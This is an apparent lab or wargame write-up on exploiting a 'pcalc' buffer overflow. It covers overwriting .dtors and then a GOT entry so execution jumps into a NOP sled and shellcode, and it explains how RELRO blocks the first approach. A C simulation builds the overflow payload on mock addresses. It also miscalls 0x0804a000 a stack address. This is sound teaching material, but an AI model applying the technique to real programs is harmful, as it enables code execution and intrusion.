11/10/2023
Overwriting dtors with pcalc

I figured this one out quite quickly, but unfortunately, due to some changes in gcc, I wasted a lot of time.

The frame is laid out as: 256-byte buffer + 4 bytes of character pointer pbuf + 4 bytes of saved EBP + 4 bytes of saved EIP. Overwriting the saved EIP gets you nothing here, because the program calls exit(), so main() never returns.

The first approach was basically to overwrite .dtors. This section of the ELF binary holds the addresses of destructor functions, which the runtime calls at exit (after main() returns or when exit() is called), so whatever address ends up there gets executed. Using objdump and nm, I got the address of .dtors. So, using the first strcpy(), I place my NOP sled and shellcode in buf and overwrite pbuf to contain the address of .dtors. In the second argument I pass the address of buf, which is then written at the .dtors address.

Upon further exploration I found that pbuf was overwritten correctly and the segmentation fault actually occurs while copying argv inside strcpy(). This made me think that there may be some protection against this attack built into gcc. I googled and found people complaining about the same thing. I eventually landed on another blog which solved the same problem by overwriting .dtors. His exploit is the same as mine, which led me to believe that there is no problem with this exploit.

What changed is the toolchain, not the technique: recent gcc and binutils put destructor pointers in .fini_array instead of .dtors, and with RELRO (on by default in most distributions' gcc) both of those sections, along with .ctors, .init_array and the non-PLT part of the GOT, are made read-only once the dynamic loader has finished relocation. A write to that address therefore faults inside strcpy(), exactly as observed; readelf -l shows a GNU_RELRO program header when a binary was linked that way. The PLT part of the GOT (.got.plt) stays writable under partial RELRO, which is why the second approach still works; only full RELRO (-z relro -z now) closes that too.

The second approach, as I knew, was basically to overwrite the GOT table. I knew straight away that this was the way to go but didn't know how to exploit it. It is quite simple, and exploitation is possible even without knowing about the GOT and PLT tables. So, basically, use x/i in GDB on the call instruction of a library function that runs after the second strcpy() (exit() here) and keep following it: soon you will land in a stub that consists of a simple jmp statement, an indirect jump through a 4-byte memory slot (that function's GOT entry). Just get the address of that slot and overwrite it with the address of buf, using the same two strcpy() calls as before: pbuf gets the slot's address and the second argument supplies the address of buf, so the next call to that function lands in the NOP sled.
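Both approaches reduce to the same write-what-where primitive: the first strcpy() picks the address that goes into pbuf, the second strcpy() chooses what is written there. The C program below is an added example for this page, not the original vulnerable program or the author's exploit. It models the frame layout (256-byte buf followed by 4-byte pbuf) and replays the two copies on a mock 32-bit address space with invented addresses, so it runs anywhere: it builds argv[1] (NOP sled, shellcode, pbuf value) and argv[2] (the address of buf), shows the .dtors slot ending up pointing at buf, shows the fault you get inside the second strcpy() when the target page is read-only, and checks the constraint strcpy() imposes on every address used, namely that none of its bytes may be 0x00. The shellcode is a constructed stand-in of int3 bytes.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 256u
#define ARG1_LEN (BUF_SIZE + 4u)   /* fills buf, then the 4 bytes that become pbuf */
#define FAULT    0xffffffffu       /* returned when a copy would SIGSEGV */

/* Two hypothetical mappings of a 32-bit process: the page holding .dtors and the
 * GOT, and one stack page.  The data page can be made read-only to model RELRO. */
typedef struct { uint32_t base; size_t size; int writable; uint8_t *bytes; } region_t;
static uint8_t data_page[0x1000], stack_page[0x1000];
static region_t regions[] = {
    { 0x08049000u, sizeof data_page,  1, data_page  },   /* hypothetical address */
    { 0xbffff000u, sizeof stack_page, 1, stack_page },   /* hypothetical address */
};
/* Constructed stand-in for shellcode: four int3 bytes, no NUL bytes. */
static const uint8_t demo_shellcode[] = { 0xcc, 0xcc, 0xcc, 0xcc };

static region_t *lookup(uint32_t addr)
{
    for (size_t i = 0; i < sizeof regions / sizeof regions[0]; i++)
        if (addr - regions[i].base < regions[i].size)   /* wraps if addr < base */
            return &regions[i];
    return NULL;
}
/* Host pointer for a mapped mock address, NULL if unmapped. */
static uint8_t *at(uint32_t a) { region_t *r = lookup(a); return r ? r->bytes + (a - r->base) : NULL; }
static void put_le32(uint8_t *d, uint32_t v) { for (int i = 0; i < 4; i++) d[i] = (uint8_t)(v >> (8 * i)); }
static uint32_t get_le32(const uint8_t *s) { uint32_t v = 0; for (int i = 0; i < 4; i++) v |= (uint32_t)s[i] << (8 * i); return v; }

/* strcpy() on the mock image: copies up to and including the NUL and faults
 * (returns -1) on an unmapped or read-only byte, as the real one would. */
static int sim_strcpy(uint32_t dst, const uint8_t *src)
{
    for (int n = 0;; n++) {
        region_t *r = lookup(dst + (uint32_t)n);
        if (!r || !r->writable) return -1;
        r->bytes[dst + (uint32_t)n - r->base] = src[n];
        if (src[n] == 0) return n + 1;
    }
}

/* An address survives strcpy() only if none of its four bytes is 0x00. */
int has_nul_byte(uint32_t v)
{
    for (int i = 0; i < 4; i++)
        if (((v >> (8 * i)) & 0xffu) == 0) return 1;
    return 0;
}

/* argv[1]: NOP sled, shellcode at the top of buf, then the value for pbuf.  The
 * terminator lands on the low byte of saved EBP; harmless, main() never returns. */
size_t build_arg1(uint8_t *out, const uint8_t *sc, size_t sc_len, uint32_t pbuf_value)
{
    if (sc_len > BUF_SIZE) return 0;
    memset(out, 0x90, BUF_SIZE);
    memcpy(out + BUF_SIZE - sc_len, sc, sc_len);
    put_le32(out + BUF_SIZE, pbuf_value);          /* the "where" */
    out[ARG1_LEN] = 0;
    return ARG1_LEN;
}

/* Replays  strcpy(buf, argv[1]); strcpy(pbuf, argv[2]);  with buf at buf_addr and
 * the 4-byte slot to hijack (.dtors entry or GOT entry) at slot.  Returns the
 * slot's value afterwards, or FAULT if either copy would segfault. */
uint32_t run_two_copies(uint32_t buf_addr, uint32_t slot, int slot_writable,
                        const uint8_t *sc, size_t sc_len)
{
    uint8_t arg1[ARG1_LEN + 1], arg2[5];
    const uint8_t *p;
    memset(data_page, 0, sizeof data_page);
    memset(stack_page, 0, sizeof stack_page);
    regions[0].writable = slot_writable;           /* 0 models RELRO-protected .dtors */
    if (build_arg1(arg1, sc, sc_len, slot) == 0) return FAULT;
    put_le32(arg2, buf_addr);                      /* the "what": jump into the sled */
    arg2[4] = 0;
    if (sim_strcpy(buf_addr, arg1) < 0) return FAULT;
    p = at(buf_addr + BUF_SIZE);                   /* pbuf now holds slot */
    if (!p || sim_strcpy(get_le32(p), arg2) < 0) return FAULT;   /* where RELRO bites */
    p = at(slot);
    return p ? get_le32(p) : FAULT;
}

/* True if buf holds the sled followed by the shellcode, as the hijacked jump expects. */
int sled_in_place(uint32_t buf_addr, const uint8_t *sc, size_t sc_len)
{
    const uint8_t *p = at(buf_addr);
    if (!p || sc_len > BUF_SIZE) return 0;
    for (size_t i = 0; i < BUF_SIZE - sc_len; i++) if (p[i] != 0x90) return 0;
    return memcmp(p + BUF_SIZE - sc_len, sc, sc_len) == 0;
}

int main(void)
{
    const uint32_t buf_addr = 0xbffff5c0u, dtors = 0x08049594u;   /* hypothetical */
    uint32_t v = run_two_copies(buf_addr, dtors, 1, demo_shellcode, sizeof demo_shellcode);
    printf("writable .dtors:  slot holds 0x%08x, sled in place: %d\n", v,
           sled_in_place(buf_addr, demo_shellcode, sizeof demo_shellcode));
    v = run_two_copies(buf_addr, dtors, 0, demo_shellcode, sizeof demo_shellcode);
    printf("read-only .dtors: %s\n", v == FAULT ? "second strcpy() faults" : "unexpected");
    printf("0x0804a000 usable as a strcpy() payload: %s\n", has_nul_byte(0x0804a000u) ? "no" : "yes");
    return 0;
}
```

The read-only run reproduces the symptom from the post: argv[1] is copied fine and pbuf holds the right value, and only the second copy faults. Against a real binary the addresses come from nm/objdump (the slot) and from GDB (buf), and the has_nul_byte() check is the one to run on both before bothering with anything else, since a stack address like 0x0804a000 would be truncated by strcpy().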